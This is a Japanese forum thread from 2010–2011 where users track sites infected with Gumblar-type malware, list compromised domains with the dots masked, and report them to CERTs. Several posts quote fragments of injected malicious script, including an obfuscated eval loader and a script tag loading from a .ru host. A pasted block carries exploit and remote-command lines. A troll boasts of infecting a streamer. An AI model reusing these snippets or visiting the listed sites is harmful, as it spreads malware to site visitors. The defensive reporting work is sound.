【Gumblar/GENO】Web改竄ウイルス総合10【8080】
484 :
名無しさん@お腹いっぱい。 :
2010/11/04(木) 07:23:33
まー マジであっちこっちに感染してるなー ほんとに仮想PCでネットすること考えないとダメかこりゃ
おかしいと思ったらこのざまorz 魚拓踏みまくってるしw
>>484 ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの?
感染してたら そのまま保存されるからな
infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね
>>492 リンク先より一部抜粋
>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。
>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。
【無】の中の人へ 「ソコ」は.htaccessやられてるみたいだぬ。 >ちょめちょめ●ru/mymap/ referer:ちょめちょめ●ru/mymap/ →404 Not Found referer:www.帝國.com/ →iframe イパーイ 危険なので以下略とす
495 :
494 :2010/11/04(木) 22:01:46
追記 UA見てるから、IE6(笑)とかで凸すr(ry
(・3・) エェー (・3・) リファラ当てるの苦手YO .htaccessかお。。。
あっ誤爆。 【無】の中の人とは違いますお。
株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
http://www.affility.co.jp/archives/233 一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
〜中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。
これから感染したサイトの魚拓はとらない方が良さそうだね
ウイルスソフト……?
XP使うならJavaもFlashもPDFも無効にしろ、 JavaやFlashやPDF使うなら、Vista以降で保護モード使え 一般社員には管理者権限でログインさせんな ってことでだいたい防御できるのにね
Flash 10.1.102.64になったよ
そのうちAndroidでも脆弱性つかれたりするんだろう そうなったら被害が怖いな ほんとうにFlashはこの先無くなったほうがいいかもね ジョブズの気持ちも分からんでもない
ジョブズには脆弱性に関してどうこう言う資格がないだろ。 AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。
chromeだと10,1,103,19 になるんだけどまたすぐ更新が出るのかな
chromeについてくるFlashはgoogleが勝手に更新してくれたような
勝手に更新するんだけどIE他向けに出ているバージョンと違うので差分が気になる 同じバージョンがIE他でも出るのかどうか
たぶん出ない Googleが好き勝手に改造してるんだろうし、 AppleにボコられてヘコんでるAdobeに 今の強大なGoogle帝国に意見する度胸は無い
Flash Player更新したらYouTubeの各ユーザーのチャンネルがきちんと見られない・・・
そういうスレじゃない
設定弄ってみれば?
ドメイン見て吹いた inininininininin●in comcomcomcomcomcom●com
なんかもう形振り構ってられなくなったのかな…
こうなった以上仕方ないだろ
n-yamashita●sakura●ne●jp
lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb
77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp
さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低
[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス(JPRS)]
http://jprs.co.jp/press/2010/101027.html
万一ゼロデイなどで感染した場合 現在有効な感染の確認方法は無いでしょうか?
ほとんどない だからみんな困ってる
見つからないようにこっそりやりたいのにそんな簡単に確認できる機構を作るわけないよね
初心者的な意見で意味無いかもしれないけど 駆除はともかく発見だけなら bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと 常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは 対応してれば何とかなると思うけどだめかな
>>522 未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。
未知の脆弱性なんて突かれるようなことはほとんどないよ ただ修正されてないだけで
脆弱性が発表されると すぐにそれを付くマルウェアが出てくる 発表しない方が良いくらいにも思える
たいていのセキュリティソフトは新型に対しては後手に回ってしまっているのが実情 セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ 基本的にはできる範囲で他の対策も行わないと意味がない といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね でもだいたい回避策あるけどね
こまめなシステムのバックアップ それが一番じゃないかな
回避策がないとかあるとか何言ってんだよ 分かってねえくせに知ったかよしてくれ
この間のFlashには回避策はなかったな 現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが 結局は脆弱性の内容によるらからな
き・・脆弱性
>>510 すでに攻撃受けてるみたいだね
それらしい報告あがってたわ
Adobe Readerは初期設定でスクリプトやらマルチメディアやら無効にすればいいのにな。
flashplayerの方のゼロデイはブラウザの設定か他のソフトの設定で無効にしとけばいけるんじゃね?
JSU●○●○● fb742cde7f13f6aa9678cb7ab0ebac982a527d3d
取扱注意 >TIA及び当羽田空港支店はフライトシミュレータ上の架空航空会社(VA)であります。 f45●aaa●livedoor●jp/~haneda/ →tour1●htm →staff1●htm 他にも・・・ ・がんぶらー ・8080 ・<script>var XepaZerc= ・<script>function 〜 ・fff.op.replace (468) ・がんぶらーっぽいの(最下部)
aguseのトップページ真っ白なんだけどなんかあったん?
鯖落ちだろ
541 :
名無しさん@お腹いっぱい。 :2010/11/22(月) 17:51:21
www●isumiskyhotel●com/ こんなに沢山入っているホテルというのもね。 こんなところに止まったら個人情報心配
>>541 / ,. -――- 、 l 〃
┏┓ ┏━━┓┏━┓ ┏┓ ┏┳┓ //: : : : !\:_:|:_: \/ハ ┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛ ┏┓ 〃: : :!、: : :|/∨ヘ : : !ヽ| ┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓ ┃┃┏━ f: : |斗-\| '下ハミV h: :! .━━━━┓ ┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛ ┗┛┃┃ ┃┃ ┃┃┃ |: : ハ マり |: :リ、: \ . ┃ ┃┃┃┃
┗┓┏┛┗┛┃┃ ┃┃ ┃┃ ┗┛┏┛┃┗━ lハハい == , . へ |: :l: 、\: \ __━┛ ┗┛┗┛
┃┃ ┃┃┏┛┃ ┏┛┃ ┏━┛┏┛ }ハ く{ }/|: :|\\\: : : : `\ .┏┓┏┓
┗┛ ┗┛┗━┛ ┗━┛ ┗━━┛ /;|: |>r--rf |: :l- 、\\\ ̄`\\┗┛┗┛
この手の注意を営業妨害だと逆ギレするのが珍しくないくらいのキチガイ業界だからな。
何が悪いのかわからない奴に説明するのはほんと難しいよ
shop-pro●jp/ 通販サイトだが グーグルのセーフブラウジングによると怪しい
>>548 んー今は警告でてないようですが
「最後に検出されたのは2010-09-21」となってて時間が立ちすぎとる
***.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?
ヒント:新手のアフィ
551 :
548 :2010/11/25(木) 00:19:36
>>549 気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん
>>550 他のサイトへのリンク先がやられた可能性もあるな
>>548-551 初心者の意見ですみません
私は通販をよく利用するのですが
例えば「***.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね?
>>553 特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない
通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです
>>553 個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ
>>549 少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな?
とにかく杜撰な管理が多いな
電話用サイトだが、いちおう shiprip●com/sponge/bob/i/index●html →<script>var NehQen= →<script>function aY 新型っぽいの <script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=ga.rfromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2・・・・・中略・・・・・))</script> ※装填されてるサイトのURLは非公開とす
>>548 たぶんここだぬ
izu-shizen●shop-pro●jp/
ここ見ればわかるんじゃね?
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中w
561 :
名無しさん@お腹いっぱい。 :2010/11/26(金) 14:26:12
会社にメールしてもISPにメールしても対処しない会社 satokk●co●jp criminal●co●jp Gumblar.X motif●jp www●la-palmedor●com/patis-shop●html Gumblar.X ここなんかは、お薬さんスパムのリダイレクトページがある i-medical●co●jp/ration73●html
563 :
名無しさん@お腹いっぱい。 :2010/11/26(金) 17:41:16
www●ropponngi●com www●soyo-pet●com www●trickys-custom●net www●ando-kagu●com www●fairwayinc●jp www●heisei-tech●com tensou●daishin-inc●jp www●100yen●co●jp interior-myhouse●com royal-cbj●jp www●ltsgo●co●jp matsuri●co●jp www●yamaharu-tosou●co●jp www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視
>>561 さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構(IPA)セキュリティセンター(ISEC)につーほ。
>>563 うげげ、目が逝っちゃうお。。。
566 :
名無しさん@お腹いっぱい。 :2010/11/27(土) 20:03:34
>>561 一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。
568 :
bcc :2010/11/29(月) 16:32:04 BE:702028962-2BP(1234)
www●rctank●jpはまだ感染放置かよ
569 :
名無しさん@お腹いっぱい。 :2010/11/29(月) 16:56:27
ドムスで商品を注文しようという方はご注意ください! www*geocities*jp/feb1710/index*html ==== こんな書き込みもあるくらいだから本人は何もしないのでしょう。 デジロックでなければ、こんなサイトは表示停止にしてもらえる のだが。。。。
COMODOとかSSMとかで対象のレジストリキーを監視するようにすればよかろう。
Malware Defenderでもいいな
理屈だけの妄言で対処ですかw
↑何も出来ない奴
よくわかんない!悔しい!とりあえず煽っとけ! …ってことだろw
マスターペニス
577 :
名無しさん@お腹いっぱい。 :2010/12/01(水) 23:29:54
java&Flashきればおk、なんて利便性を大きく損なうアホな対策法に比べりゃ キー監視なんてまだ有情だな
すまんageた 巻き添え規制が長かったもんで・・・
専ブラ使いましょうや
取扱注意 ダイワ包材株式会社 www●daiwa-pf●co●jp/ ↓ <script>var QaSehalo=2 <script>function aY
おしんつづくなぁ。。。
>>580 おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。
あぁ、「index●html」、「index●htm」、「newpage」とか13ページのほかに サイト内検索したら、まだいぱーいあたぁ。。。orz.....
取扱注意 絶賛放置中につき再掲載 www●snowfan-mimo●com/area/area-service●asp?sID=500 など 絶賛放置中なゴミサイトは消滅すべき
久々にyoutubeをセーフブラウジングでチェックしたらなんかあるみたいだな あれはyoutubeの広告のリンク先のサイトでもやられたのか?
FirefoxはAdblock Plusに「
http://*.pdf 」を放り込んでおけば良い
ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ
>>584 それは初心者の質問スレで聞いた方がよくね?
ここに書くんだからgumbler関係だろう それを初心者池で蹴るのはこのスレの用途の否定じゃないか?
取扱注意 www48●tok2●com/home/karawasuichi/ ↓ ・Jsunpack 5f6ec9a74fc14cb25efe818a81cfb9605bda288c ↓ 「download●XXXXX●jp/」 ※腹筋注意w
590 :
名無しさん@お腹いっぱい。 :2010/12/06(月) 19:35:19 BE:351014832-2BP(538)
>>589 上 tok2につーほー
下 既にドメインパーキングのような
取扱注意 株式会社 電研端子製作所 www●denken-t●co●jp/eng/qa/qa●asp ※初代(?)Gumblar 日本一の幼稚園 日本一の子育てを応援する津久井幼稚園 www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html ※初代(?)Gumblar
>>593 過去分も含めて 乙乙
取扱注意
>顛峰グループ(Sofmit Group)は〜〜中略〜〜中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx
↓
<script src=http://www●errghr●ru/script●js></script>
ウイルスバスターと同じく、下から数えてNo.1ということですねw
>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかw
どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz
>>594 ノ
上:こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下:atpagesとかにつーほ。
マスターペニス
>>600 2ヶ月くらい寝てたのか?
冬眠するにゃ早過ぎるような気がするが・・
今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。
どうしてもADPで防ぎたいなら
http://* ←これを入れておけよw
「驚きの白さ」
そういえばmicroadの広告があるサイトを見たら感染したなんて話も前にあったなw
それも
>>2-3 をきちんとしていれば問題なかったはず。
心配ならadっぽいアドレスをカットしておけよ
>QuickTime 7.6.9
このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須
>>600 1月に書かれた記事でもう古くて不完全な情報だよん
AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし
基本的な対策は
>>2-3 これ以上もこれ以下もないん (ゼロデイ攻撃は除く)
とりあえずどっかのサイト行く前に必ずセーフブラウジングに掛ける癖を付ければ良いんじゃないかな
>>606 そんな面倒な事するくらいならGoogle Chrome使えよw
そんなのじゃ無理 Secure Browserが良いよ
>>606 そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw
やっぱりこの場合はは危険かどうかわからないってことなのかな?
610 :
名無しさん@お腹いっぱい。 :2010/12/13(月) 16:05:23
OCNからメールが。 自分のWEBサイトがガンブラーに感染してると。 調べてみたらひとつ怪しいファイルがあったので削除。 Windowsのアップデート〜adobe関係までアップデート。 ウイルスソフトでウイルスチェック。 WEBホストのパスワードをすべて変更。 嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。 これでよろしいでしょうか?
webサイトを閉じる。 PCリカバリ。
>>610 > 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの?
それに対する対策はしたの?
クリーンインスコした方が…
>>611 サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖
感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC〜ができないなら迷わずリカバリ
PCがキレイになったら、
>>2-3 を実施(ずっと継続する)+パスワード変更とか・・
サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする
>>610 早くHP閉鎖しろカス!!!!!!!!!!!1
>>610 HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した?
Javaランタイムはアップデートした?
他のすべてのインストールソフトに対してアップデートを確認した?
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった?
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた?
LAN内に他にPCはないの?
ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提
情弱の不幸でメシウマ
ガンブラーに感染しちゃったら、上の方にあった対処法に従ってやるんだろうけど クリーンインストールやってもだめなんじゃないの? Cドライブにシステム、データ他はパーティション切るか 別ドライブで「D」以降にって人が多いと思うけど システムドライブだけきれいになっても データドライブにWEBのファイルがある人は、 そのドライブに改鼠されたデータが残ってたらどうなるの?
毎回再インストール これ最強 しかしHDDがそのうち物故割れるという諸刃の刃
>>618 サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん
万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ
>>619 そういうの関係なく壊れるときは壊れます
まだ個人のブログなら改ざんされても見ている人からも報告があるだけ良いな 企業のサイトなんかは連絡しても「何それ?」って返ってくるし
>>620 ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった?
>>610 うーん、できれば感染していた時のaguseの結果が見たかった
マスターペニス
詳しくことはよくわからないけど puredress●com
マスターペニス
今youtubeをaguseで見る限りヤバくね? s0.2mdn●net/879366/flashwright_1_2●js という奴が見つかるのだが
間違えた、訂正します s0.2mdn●net/879366/flashwriht_1_2●js
633 :
630 :2010/12/22(水) 21:01:29
度々すまない また間違えた aguseで見つかったのはこれです s0.2mdn●net/879366/flashwrite_1_2●js
636 :
630 :2010/12/22(水) 21:52:54
>>634 『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…
URL手打ちなんてかわいい
>>630-636 これかにゃ?
ttp://forums.liveleak.com/showthread.php?p=882808 >well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from http://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略
So-netのセキュリティ通信のサイトって無くなった? 数日前に突然消えて、恐くてアクセス出来ない・・
普通に見られるよ。更新中だったりしたんじゃないの?
怖くてアクセス出来ないってかわいいな(笑)
俺様にウィルス踏まされて怒り狂ってる低脳どもざまあだな そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな (VдV)♪
いくらネットの法律改正しても 俺様はまだ一度も逮捕されてないお(Vд^)-☆調子に乗り乗りですお!
相手にされてねえw
VIPに釣りリンク貼ってスクリプトでリモホ抜いたりしたことはあるが 他人にウイルスは踏ませたことがないな
真偽はともかくスレ違いだろ
>>648 そんなリンク見る気にもならないけど実際に発生しているのは事実
>>648 そのグループ回答者たちの各回答見ると「○○さんの〜」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたw
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしw
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ?
Security Tool から Security Shield になったみたいね
>>648 改行厨にアフィアドレス誘導ワロタ
マスターペニス
MSEに似た偽セキュリティソフトもあるから具体的な名前すら 出さない注意喚起なんてチェーンメールのデマみたいだ。
ttp●//www●mypondstore●com/?q=on-line_scan aguseでクロ判定
658 :
名無しさん@お腹いっぱい。 :2010/12/30(木) 12:02:28
uemura-bokujyo●co●jp
659 :
名無しさん@お腹いっぱい。 :2010/12/30(木) 12:17:10
www●ropponngi●com www●soyo-pet●com www●trickys-custom●net oak-co●net www●himawarinosato●or●jp www●soyo-pet●com www●ltsgo●co●jp interior-myhouse●com /royal-cbj●jp www●paohouse●co●jp www●yamaharu-tosou●co●jp motif●jp satokk●co●jp
>>628 今日知った。google先生さすがだぜ
Gumblar/8080系再始動?
ttp://www.google.com/safebrowsing/diagnostic?site=addonrock ●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。
addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404
Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね?
作戦通り♪
(VдV)FF14のニコ生でブラクラ踏ませてきた
http://live.nicovideo.jp/watch/co473160 FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた
↓
そのショックで主のPC固まる&主の精神も固まり中
↓
最初は主をフォローしてたリスナーも飽きて他いった
↓
放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ
(VДV)ざまああああああああああああああああああ!!!!!!
でへへへ、俺様マジGJでしょ(*VдV*)
>>663 分かったからコテかBeつけて書き込んでよ
>>663 これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう
ニコ動利用するときにはメアド取得必要だし 被害届けとかも出せるんじゃない?例え捨てアカでも
マスターペニス
(VДV)ムハハハハハハハ! 無知が多くて笑えるな(>w<)新年早々上機嫌お☆
673 :
名無しさん@お腹いっぱい。 :2011/01/03(月) 05:17:51
673みたいにコミュニケーション力が駄目な奴は文章化しても駄目なんだよ そういう同僚とたまにメールしてるからよくわかる
まあダメな奴ほど自分がダメだって気付かないからな
すごいな 自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ こういうのって脳の障害じゃないのかな 新年早々良いものを見ることができて感動した
むしろ、ここでURLの解説してるのって頭が悪い奴ばかりだろ 過去に俺様が指摘したような 悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな ┐(VДV)┌ 偽善者ほど醜いものはねーぜ! んな中途半端なことしてねーで、どうせなら悪用推薦!って書くようするか、死ね!
ウィルスといえば 最近、朝起きると とても高濃度な痰が出る 恐らくウィルスが含まれているのだろう それを10階のベランダから吐くのがすっかり日課になってる 何が言いたいのかというとだ 俺様はウィルスを踏ませることもあれば降らせることも・・ry Σ(VДV )\(>w<)ったねぇよ!
おW 680じゃん 数字の8が大好きおヽ(VдV)ノおっおW
>>679 やべ・・ちょっと面白いと思っちまったじゃねーか!
高速道路でコンクリート上から落としてきた!って書いたら通報もんだけど
痰の場合はどうなんだろうなwwww
マスターペニス
こういうクソコテがある日突然音沙汰なくなったりするんだよな 面白いなあ
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440 ・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/ 漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html 454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
擁護認定の流れが始まるのか 胸薄
(VдV)お前ら煽りに耐性ねーのな 自分で言うのもなんだけどコテにも耐性ねーだろお前ら 俺様の狙い通りの反応なんだもーん♪(VдV三VдV)だもーん♪ 気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(>w<)プクススススwww
88をゲットしたので久々にこの顔登場 ∞ 8VдV8 !?
NHK教育 23:30 ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?
692 :
ひみつの検疫さん :2024/06/15(土) 14:12:18 ID:MarkedRes
汚染を除去しました。
やめろや
ダンさん落ちてる。。。orz....
696 :
名無しさん@お腹いっぱい。 :2011/01/20(木) 19:53:56
2chハックの件以降、キチガイを見ないな…
Gumblarももう終わりか、つまんないな
あるっぽい。 Received 2011-01-19 11:54:20 JSUNPACK 8fa8604f9abcf13ca0abe8775cdad54cad50d4a1 VIRUSTOTAL順番待ち7000番台ってどーよ。。。
699 :
名無しさん@お腹いっぱい。 :2011/01/24(月) 13:26:14
てす
>>698 malware作者が妨害のためにゴミ投げまくったんでしょ
701 :
神 :2011/01/25(火) 14:52:53
ウイルスサイトのURL貼ってくんない? まぢウイルスかかってみたいんだけどさぁ www
643 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 04:49:34 ID:ATQNV0HP0 [1/5]
1・24学習会 私たちの言論・表現活動の自由が危ない!
すべてのインターネット通信が監視される?
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
活動が規制されて、民主主義を危うくするでしょう。
学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と き 1月24日(月)午後6時30分〜
■ところ かながわ県民センター709号室
(横浜駅西口から徒歩5分、ヨドバシ・カメラ裏)
地図
http://www.pref.kanagawa.jp/osirase/02/0051/center/access.html ■お話し 山下 幸夫さん(弁護士)
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費 500円
■主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
ネットワーク反監視プロジェクト Tel.070-5553-549 5
|1・25コンピュター監視法学習会のご案内 |カテゴリ : 監視社会 執筆 : toshi 2010-1-6 3:32 以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。 コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。 しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、 コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。 1・25コンピュター監視法学習会のご案内 コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした 動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため の国内関連法の整備を理由としてだされたコンピュータ監視法です。 コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑 法等の一部改正案」としてだされたところに鋭く示されています。 いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。 サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ ンピュータ監視法の制定を許してはなりません。 同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法 推進派が条約の批准を理由にいつ上程してくるかはわかりません。 サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。 ぜひ、ご参加ください。
653 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 05:37:53 ID:ATQNV0HP0 [5/5]
日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)
http://www.ustream.tv/recorded/12218086 ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」(通称コンピューター監視法)が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。
http://www.anti-tochoho.org/ut/ss20100201.html
総務省のインフルエンザのページ貼ったらファビョってしまったようだ すまない
これなんだ? analyzer5.fc2.com:8080/ana/processor.php?uid=107662 analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0
FC2のアクセス解析だろ
fc2のアナライザーはadblockなんかでブロックしても特に問題ない
>>710 お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った
↓
そのサイト主がFC2アクセス解析を見てリンクを辿った
↓
